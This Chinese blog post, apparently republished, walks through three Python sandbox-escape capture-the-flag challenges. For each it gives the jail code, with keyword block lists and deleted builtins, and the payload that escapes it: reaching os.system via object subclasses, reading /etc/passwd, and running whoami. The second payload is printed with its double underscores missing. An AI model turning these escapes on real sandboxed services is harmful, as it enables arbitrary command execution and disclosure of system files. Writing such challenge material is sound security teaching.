python沙箱逃逸的几道题

第一道

from __future__ import print_function

print("Welcome to my Python sandbox! Enter commands below!")

banned = [
    "import",
    "exec",
    "eval",
    "pickle",
    "os",
    "subprocess",
    "kevin sucks",
    "input",
    "banned",
    "cry sum more",
    "sys"
]

targets =__builtins__.__dict__.keys()
targets.remove('raw_input')
targets.remove('print')
for x in targets:
    del __builtins__.__dict__[x]

while 1:
    print(">>>", end=' ')
    data = raw_input()

    for no in banned:
        if no.lower() in data.lower():
            print("Nobueno")
            break
    else: # this means nobreak
        exec data

payload: ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ls')

第二道

#!/usr/bin/env python
from re import findall
def make_secure():
    UNSAFE = ['open',
              'file',
              'execfile',
              'compile',
              'reload',
              '__import__',
              'eval',
              'input']
    for func in UNSAFE:
        del __builtins__.__dict__[func]

# Remove dangerous builtins
make_secure()
print 'Go Ahead, Expoit me >;D'
while True:
    try:
        print ">>>",
        # Read user input until the first whitespace character
        inp = findall('\S+', raw_input())[0]
        a = None
        # Set a to the result from executing the user input
        exec 'a=' + inp
        print 'Return Value:', a
    except Exception, e:
        print 'Exception:', e

payload:().class.bases[0].subclasses()[40]("/etc/passwd").read()

前两道环境是py2,第三道是py3

第三道

# -*-coding:utf-8-*-  

#!/usr/bin/python3  
import sys, cmd, os  

del __builtins__.__dict__['__import__']  
del __builtins__.__dict__['eval']  

intro = """ 
pwnhub cuit 
pwn everything 
Rules: 
 -No import 
 -No ... 
 -No flag 

"""  

def execute(command):  
    exec(command, globals())  

class Jail(cmd.Cmd):  
 prompt     = '>>> '  
 filtered    = '\'|.|input|if|else|eval|exit|import|quit|exec|code|const|vars|str|chr|ord|local|global|join|format|replace|translate|try|except|with|content|frame|back'.split('|')  

 def do_EOF(self, line):  
     sys.exit()  

 def emptyline(self):  
     return cmd.Cmd.emptyline(self)  

 def default(self, line):  
     sys.stdout.write('\x00')  

 def postcmd(self, stop, line):  
     if any(f in line for f in self.filtered):  
         print("You are a big hacker !!!")  
         print("Go away")  
     else:  
        try:  
             execute(line)  
        except NameError:  
             print("NameError: name '%s' is not defined" % line)  
        except Exception:  
             print("Error: %s" % line)  
     return cmd.Cmd.postcmd(self, stop, line)  

if __name__ == "__main__":  
 try:  
     Jail().cmdloop(intro)  
 except KeyboardInterrupt:  
     print("\rSee you next time !")

payload:print(getattr(os, "system")("whoami"))

等有空好好看看python面向对象的那一块知识

参考链接:
http://www.php.cn/python-tutorials-356723.html
http://blog.51cto.com/13620939/2075204
https://xz.aliyun.com/t/52#toc-0
http://www.k0rz3n.com/2018/05/04/Python%20%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E5%A4%87%E5%BF%98/
http://www.bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPython-sec%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/

转载于:https://www.cnblogs.com/afanti/p/10097743.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值